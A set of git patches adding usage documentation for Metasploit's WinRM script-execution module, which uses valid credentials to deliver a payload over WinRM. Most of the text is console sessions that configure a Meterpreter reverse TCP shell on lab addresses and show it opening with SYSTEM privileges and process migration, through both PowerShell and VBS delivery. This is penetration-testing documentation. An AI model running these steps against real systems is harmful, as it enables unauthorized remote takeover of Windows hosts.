From 5ab0129f0f4dfd12b4b7b5357e9ed2fa7d1cfaa1 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sun, 19 Mar 2017 18:27:00 +0530 Subject: [PATCH 1/5] Documentation on winrm_script_exec --- .../exploit/winrm/winrm_script_exec.md | 67 +++++++++++++++++++ 1 file changed, 67 insertions(+) create mode 100644 documentation/modules/exploit/winrm/winrm_script_exec.md diff --git a/documentation/modules/exploit/winrm/winrm_script_exec.md b/documentation/modules/exploit/winrm/winrm_script_exec.md new file mode 100644 index 0000000000..8bc4f78ec2 --- /dev/null +++ b/documentation/modules/exploit/winrm/winrm_script_exec.md @@ -0,0 +1,67 @@ +## Vulnerable Application + +Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. +IMPORTANT: If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. +[EXPLOIT DB:] https://www.exploit-db.com/exploits/22526/ + + + +## Example Usage + +``` +msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec +msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(winrm_script_exec) > set USERNAME admin +USERNAME => admin +msf exploit(winrm_script_exec) > set PASSWORD admin +PASSWORD => admin +msf exploit(winrm_script_exec) > set LHOST 192.168.198.138 +LHOST => 192.168.198.138 +msf exploit(winrm_script_exec) > set LPORT 4444 +LPORT => 4444 +msf exploit(winrm_script_exec) > set RHOST 192.168.198.130 +RHOST => 192.168.198.130 +msf exploit(winrm_script_exec) > show options + +Module options (exploit/windows/winrm/winrm_script_exec): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DOMAIN WORKSTATION yes The domain to use for Windows authentification + FORCE_VBS false yes Force the module to use the VBS CmdStager + PASSWORD admin yes A specific password to authenticate with + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOST 192.168.198.130 yes The target address + RPORT 5985 yes The target port (TCP) + SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 8080 yes The local port to listen on. + SSL false no Negotiate SSL/TLS for outgoing connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + URI /wsman yes The URI of the WinRM service + URIPATH no The URI to use for this exploit (default is random) + USERNAME admin yes A specific username to authenticate as + VHOST no HTTP server virtual host + + +Payload options (windows/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 192.168.198.138 yes The listen address + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Windows + + + +msf exploit(winrm_script_exec) > run +[*] Started reverse TCP handler on 192.168.198.138:4444 + + From 02a3b172b426f9c747603d65a822a02985f22d70 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sun, 19 Mar 2017 21:52:46 +0530 Subject: [PATCH 2/5] Documentation on winrm_script_exec updated 1.1 --- .../exploit/winrm/winrm_script_exec.md | 155 +++++++++++++----- 1 file changed, 114 insertions(+), 41 deletions(-) diff --git a/documentation/modules/exploit/winrm/winrm_script_exec.md b/documentation/modules/exploit/winrm/winrm_script_exec.md index 8bc4f78ec2..c116cb94bc 100644 --- a/documentation/modules/exploit/winrm/winrm_script_exec.md +++ b/documentation/modules/exploit/winrm/winrm_script_exec.md @@ -1,8 +1,10 @@ ## Vulnerable Application -Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. -IMPORTANT: If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. -[EXPLOIT DB:] https://www.exploit-db.com/exploits/22526/ +WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). +This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. + +**IMPORTANT:-** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. + @@ -22,46 +24,117 @@ msf exploit(winrm_script_exec) > set LPORT 4444 LPORT => 4444 msf exploit(winrm_script_exec) > set RHOST 192.168.198.130 RHOST => 192.168.198.130 -msf exploit(winrm_script_exec) > show options -Module options (exploit/windows/winrm/winrm_script_exec): +**Powershell 2.0 is used for payload delivery here** - Name Current Setting Required Description - ---- --------------- -------- ----------- - DOMAIN WORKSTATION yes The domain to use for Windows authentification - FORCE_VBS false yes Force the module to use the VBS CmdStager - PASSWORD admin yes A specific password to authenticate with - Proxies no A proxy chain of format type:host:port[,type:host:port][...] - RHOST 192.168.198.130 yes The target address - RPORT 5985 yes The target port (TCP) - SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 - SRVPORT 8080 yes The local port to listen on. - SSL false no Negotiate SSL/TLS for outgoing connections - SSLCert no Path to a custom SSL certificate (default is randomly generated) - URI /wsman yes The URI of the WinRM service - URIPATH no The URI to use for this exploit (default is random) - USERNAME admin yes A specific username to authenticate as - VHOST no HTTP server virtual host - - -Payload options (windows/meterpreter/reverse_tcp): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) - LHOST 192.168.198.138 yes The listen address - LPORT 4444 yes The listen port - - -Exploit target: - - Id Name - -- ---- - 0 Windows - - - -msf exploit(winrm_script_exec) > run +msf exploit(winrm_script_exec) > exploit [*] Started reverse TCP handler on 192.168.198.138:4444 +[*] checking for Powershell 2.0 +[*] Attempting to set Execution Policy +[+] Set Execution Policy Successfully +[*] Grabbing %TEMP% +[*] Uploading powershell script to C:\Users\ADMINI~1\AppData\Local\Temp\uFWUOIgQ.ps1 (This may take a few minutes)... +[*] Attempting to execute script... +[*] Sending stage (752128 bytes) to 192.168.198.130 +[*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:5985) at 2017-03-19 21:30:05 +0100 +meterpreter > +[*] Session ID 1 (192.168.198.138:4444 -> 192.168.198.130:5985) processing InitialAutoRunScript 'post/windows/manage/smart_migrate' +[*] Current server process: powershell.exe (608) +[+] Migrating to 568 +[+] Successfully migrated to process +meterpreter > sysinfo +gComputer : WIN-JZF4OTQMX4W +OS : Windows 2008 (Build 6002, Service Pack 2). +Architecture : x86 +System Language : en_US +Meterpreter : x86/win32 +meterpreter > getuid +gServer username: NT AUTHORITY\SYSTEM +meterpreter > getpid +Current pid: 568 +meterpreter > + +**In case the VBS CmdStager is used for payload delivery here** + +msf exploit(winrm_script_exec) > set FORCE_VBS true +FORCE_VBS => true +msf exploit(winrm_script_exec) > rexploit +[*] Reloading module... +[*] Started reverse handler on 192.168.1.129:4444 +[*] User selected the FORCE_VBS option +[*] Command Stager progress - 2.01% done (2046/101936 bytes) +[*] Command Stager progress - 4.01% done (4092/101936 bytes) +[*] Command Stager progress - 6.02% done (6138/101936 bytes) +[*] Command Stager progress - 8.03% done (8184/101936 bytes) +[*] Command Stager progress - 10.04% done (10230/101936 bytes) +[*] Command Stager progress - 12.04% done (12276/101936 bytes) +[*] Command Stager progress - 14.05% done (14322/101936 bytes) +[*] Command Stager progress - 16.06% done (16368/101936 bytes) +[*] Command Stager progress - 18.06% done (18414/101936 bytes) +[*] Command Stager progress - 20.07% done (20460/101936 bytes) +[*] Command Stager progress - 22.08% done (22506/101936 bytes) +[*] Command Stager progress - 24.09% done (24552/101936 bytes) +[*] Command Stager progress - 26.09% done (26598/101936 bytes) +[*] Command Stager progress - 28.10% done (28644/101936 bytes) +[*] Command Stager progress - 30.11% done (30690/101936 bytes) +[*] Command Stager progress - 32.11% done (32736/101936 bytes) +[*] Command Stager progress - 34.12% done (34782/101936 bytes) +[*] Command Stager progress - 36.13% done (36828/101936 bytes) +[*] Command Stager progress - 38.14% done (38874/101936 bytes) +[*] Command Stager progress - 40.14% done (40920/101936 bytes) +[*] Command Stager progress - 42.15% done (42966/101936 bytes) +[*] Command Stager progress - 44.16% done (45012/101936 bytes) +[*] Command Stager progress - 46.16% done (47058/101936 bytes) +[*] Command Stager progress - 48.17% done (49104/101936 bytes) +[*] Command Stager progress - 50.18% done (51150/101936 bytes) +[*] Command Stager progress - 52.19% done (53196/101936 bytes) +[*] Command Stager progress - 54.19% done (55242/101936 bytes) +[*] Command Stager progress - 56.20% done (57288/101936 bytes) +[*] Command Stager progress - 58.21% done (59334/101936 bytes) +[*] Command Stager progress - 60.21% done (61380/101936 bytes) +[*] Command Stager progress - 62.22% done (63426/101936 bytes) +[*] Command Stager progress - 64.23% done (65472/101936 bytes) +[*] Command Stager progress - 66.24% done (67518/101936 bytes) +[*] Command Stager progress - 68.24% done (69564/101936 bytes) +[*] Command Stager progress - 70.25% done (71610/101936 bytes) +[*] Command Stager progress - 72.26% done (73656/101936 bytes) +[*] Command Stager progress - 74.26% done (75702/101936 bytes) +[*] Command Stager progress - 76.27% done (77748/101936 bytes) +[*] Command Stager progress - 78.28% done (79794/101936 bytes) +[*] Command Stager progress - 80.29% done (81840/101936 bytes) +[*] Command Stager progress - 82.29% done (83886/101936 bytes) +[*] Command Stager progress - 84.30% done (85932/101936 bytes) +[*] Command Stager progress - 86.31% done (87978/101936 bytes) +[*] Command Stager progress - 88.31% done (90024/101936 bytes) +[*] Command Stager progress - 90.32% done (92070/101936 bytes) +[*] Command Stager progress - 92.33% done (94116/101936 bytes) +[*] Command Stager progress - 94.34% done (96162/101936 bytes) +[*] Command Stager progress - 96.34% done (98208/101936 bytes) +[*] Command Stager progress - 98.35% done (100252/101936 bytes) +[*] Sending stage (752128 bytes) to 192.168.198.130 +[*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.130:5985) at 2017-03-19 21:46:05 +0100 +[*] Session ID 2 (192.168.198.138:4444 -> 192.168.1.142:49158) processing InitialAutoRunScript 'post/windows/manage/smart_migrate' +[*] Current server process: mSPvA.exe (3548) +[+] Migrating to 580 +[+] Successfully migrated to process +[*] nil +[*] Command Stager progress - 100.00% done (101936/101936 bytes) +meterpreter > getpid +Current pid: 580 +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > sysinfo +Computer : WIN-OPAUFTQFWTB +OS : Windows 2008 (Build 6002, Service Pack 2). +Architecture : x86 +System Language : en_US +Meterpreter : x86/win32 +meterpreter > + + + + + + From d22e43dedd58edfe10271e0f88ea94fd8f54f676 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sun, 19 Mar 2017 23:11:23 +0530 Subject: [PATCH 3/5] Documentation on winrm_script_exec updated 1.2 --- .../exploit/winrm/winrm_script_exec.md | 40 +++++++++++-------- 1 file changed, 23 insertions(+), 17 deletions(-) diff --git a/documentation/modules/exploit/winrm/winrm_script_exec.md b/documentation/modules/exploit/winrm/winrm_script_exec.md index c116cb94bc..997beb5e99 100644 --- a/documentation/modules/exploit/winrm/winrm_script_exec.md +++ b/documentation/modules/exploit/winrm/winrm_script_exec.md @@ -5,11 +5,12 @@ This module uses valid credentials to login to the WinRM service and execute a p **IMPORTANT:-** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. - - - ## Example Usage +## Windows 2008 + +**Powershell 2.0 is used for payload delivery here** + ``` msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp @@ -24,9 +25,6 @@ msf exploit(winrm_script_exec) > set LPORT 4444 LPORT => 4444 msf exploit(winrm_script_exec) > set RHOST 192.168.198.130 RHOST => 192.168.198.130 - -**Powershell 2.0 is used for payload delivery here** - msf exploit(winrm_script_exec) > exploit [*] Started reverse TCP handler on 192.168.198.138:4444 [*] checking for Powershell 2.0 @@ -54,13 +52,28 @@ meterpreter > getpid Current pid: 568 meterpreter > +``` + **In case the VBS CmdStager is used for payload delivery here** +``` +msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec +msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(winrm_script_exec) > set USERNAME admin +USERNAME => admin +msf exploit(winrm_script_exec) > set PASSWORD admin +PASSWORD => admin +msf exploit(winrm_script_exec) > set LHOST 192.168.198.138 +LHOST => 192.168.198.138 +msf exploit(winrm_script_exec) > set LPORT 4444 +LPORT => 4444 +msf exploit(winrm_script_exec) > set RHOST 192.168.198.130 +RHOST => 192.168.198.130 msf exploit(winrm_script_exec) > set FORCE_VBS true FORCE_VBS => true -msf exploit(winrm_script_exec) > rexploit -[*] Reloading module... -[*] Started reverse handler on 192.168.1.129:4444 +msf exploit(winrm_script_exec) > exploit +[*] Started reverse TCP handler on 192.168.198.138:4444 [*] User selected the FORCE_VBS option [*] Command Stager progress - 2.01% done (2046/101936 bytes) [*] Command Stager progress - 4.01% done (4092/101936 bytes) @@ -130,11 +143,4 @@ Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > - - - - - - - - +``` From 90744b0162d3590c46ba017c6b07c2bc91882918 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sun, 19 Mar 2017 23:31:30 +0530 Subject: [PATCH 4/5] Documentation on winrm_script_exec updated 1.3 --- documentation/modules/exploit/winrm/winrm_script_exec.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/documentation/modules/exploit/winrm/winrm_script_exec.md b/documentation/modules/exploit/winrm/winrm_script_exec.md index 997beb5e99..6ff1e3847b 100644 --- a/documentation/modules/exploit/winrm/winrm_script_exec.md +++ b/documentation/modules/exploit/winrm/winrm_script_exec.md @@ -3,11 +3,11 @@ WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy. -**IMPORTANT:-** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. +**IMPORTANT:** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. -## Example Usage +### Example Usage -## Windows 2008 +### Windows 2008 **Powershell 2.0 is used for payload delivery here** @@ -54,7 +54,7 @@ meterpreter > ``` -**In case the VBS CmdStager is used for payload delivery here** +**VBS CmdStager is used for payload delivery here** ``` msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec From 18fec876ce2382f6387305dc6b0a71598e3cf5e3 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sun, 19 Mar 2017 23:43:08 +0530 Subject: [PATCH 5/5] Documentation on winrm_script_exec updated 1.4 --- documentation/modules/exploit/winrm/winrm_script_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/winrm/winrm_script_exec.md b/documentation/modules/exploit/winrm/winrm_script_exec.md index 6ff1e3847b..8612558f64 100644 --- a/documentation/modules/exploit/winrm/winrm_script_exec.md +++ b/documentation/modules/exploit/winrm/winrm_script_exec.md @@ -5,7 +5,7 @@ This module uses valid credentials to login to the WinRM service and execute a p **IMPORTANT:** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. -### Example Usage +## Example Usage ### Windows 2008